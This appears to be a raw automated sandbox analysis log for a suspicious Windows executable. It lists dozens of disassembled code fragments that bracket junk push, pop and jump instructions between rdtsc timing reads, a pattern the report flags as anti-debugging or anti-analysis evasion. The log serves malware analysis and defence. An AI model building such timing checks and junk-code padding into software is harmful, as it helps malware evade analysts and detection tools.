                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0DBCA second address: D0DBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6968D5473Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AACD second address: D8AAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A242 second address: D8A248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A248 second address: D8A24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A24C second address: D8A25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F6968D54736h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF16 second address: D8AF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF29 second address: D8AF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF2D second address: D8AF7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EABh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F6969412EB9h 0x00000015 jmp 00007F6969412EB4h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 jl 00007F6969412EA6h 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF7D second address: D8AF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AF81 second address: D8AF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91EB3 second address: D91EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6968D54748h 0x0000000b jmp 00007F6968D5473Bh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91EE1 second address: D91EE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91EE7 second address: D91F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F6968D54738h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6968D54745h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91F0E second address: D91F1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F6969412EA6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91F1D second address: D91F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91F23 second address: D91F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91BAB second address: D91BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6968D5473Fh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F6968D54744h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D91BDD second address: D91BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BD4F second address: D9BD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BD53 second address: D9BD5D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6969412EA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9BD5D second address: D9BD71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F6968D5473Ah 0x0000000e pop edi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AEB8 second address: D9AEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AEC1 second address: D9AEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AEC5 second address: D9AED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AED8 second address: D9AEF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6968D54746h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B359 second address: D9B371 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6969412EB2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B50E second address: D9B514 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B6AD second address: D9B6D1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push edi 0x00000011 pop edi 0x00000012 jmp 00007F6969412EB1h 0x00000017 pop ecx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B6D1 second address: D9B6E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jns 00007F6968D54736h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B856 second address: D9B865 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6969412EA6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0246 second address: DA024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA024A second address: DA0250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0250 second address: DA025A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F6968D54736h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA025A second address: DA025E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA03AF second address: DA03C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA03C1 second address: DA03C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D52266 second address: D5226A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5226A second address: D52274 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA159D second address: DA15A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA15A3 second address: DA15A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA478F second address: DA47A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D54746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE6C7 second address: CFE6D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE6D1 second address: CFE6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE6D7 second address: CFE6DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE6DC second address: CFE6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFE6E2 second address: CFE6EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAA470 second address: DAA4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6968D54736h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F6968D54744h 0x00000011 jmp 00007F6968D54746h 0x00000016 jnc 00007F6968D54736h 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAD5A second address: DAAD75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAAD75 second address: DAAD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB366 second address: DAB38A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6969412EB7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB38A second address: DAB3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F6968D54744h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB688 second address: DAB68E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB68E second address: DAB6AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F6968D54749h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB6AD second address: DAB6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB6B1 second address: DAB6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jmp 00007F6968D54744h 0x0000000f jmp 00007F6968D54743h 0x00000014 pop esi 0x00000015 jng 00007F6968D5473Eh 0x0000001b push edx 0x0000001c pop edx 0x0000001d jl 00007F6968D54736h 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB6F7 second address: DAB6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB6FB second address: DAB705 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6968D54736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9BC second address: DAB9CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F6969412EA6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAB9CD second address: DABA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6968D5473Dh 0x0000000c jnl 00007F6968D54736h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6968D5473Dh 0x0000001b pushad 0x0000001c jmp 00007F6968D54743h 0x00000021 jnc 00007F6968D54736h 0x00000027 jne 00007F6968D54736h 0x0000002d popad 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABA19 second address: DABA3C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F6969412EA6h 0x00000009 jmp 00007F6969412EB1h 0x0000000e pop esi 0x0000000f jo 00007F6969412EACh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DABCAE second address: DABCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F6968D54741h 0x0000000b jmp 00007F6968D54745h 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5441 second address: DB5460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F6969412EABh 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB458B second address: DB45CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6968D54736h 0x0000000a jnc 00007F6968D54736h 0x00000010 jng 00007F6968D54736h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6968D54743h 0x0000001e jmp 00007F6968D54746h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB485A second address: DB487D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6969412EAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007F6969412EA6h 0x00000012 jp 00007F6969412EA6h 0x00000018 popad 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB487D second address: DB489B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6968D54744h 0x00000009 js 00007F6968D54736h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB4D1D second address: DB4D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6969412EB6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5149 second address: DB516E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6968D54736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jns 00007F6968D54736h 0x00000011 jmp 00007F6968D54742h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB516E second address: DB5173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB5173 second address: DB517E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC22C second address: DBC271 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F6969412EB9h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 je 00007F6969412EBEh 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC271 second address: DBC276 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC276 second address: DBC28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007F6969412EAAh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC815 second address: DBC819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC819 second address: DBC82E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F6969412EA6h 0x0000000d je 00007F6969412EA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC82E second address: DBC839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBC839 second address: DBC83D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCB00 second address: DBCB04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF1F second address: DBCF23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF23 second address: DBCF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBCF2D second address: DBCF4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F6969412EADh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DBDE44 second address: DBDE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC49B7 second address: DC49BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4403 second address: DC440D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC440D second address: DC4434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F6969412EB6h 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F6969412EA6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC4434 second address: DC4455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6968D5473Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6968D5473Eh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC45BD second address: DC45DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b jne 00007F6969412EACh 0x00000011 push edx 0x00000012 jno 00007F6969412EA6h 0x00000018 pop edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3715 second address: DD3719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3719 second address: DD372D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F6969412EAEh 0x0000000c jo 00007F6969412EA6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6EDD second address: DD6EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6EE1 second address: DD6EF7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6969412EA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F6969412EACh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDC86F second address: DDC879 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6968D5473Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3D56 second address: DE3D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6969412EA6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3D69 second address: DE3D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
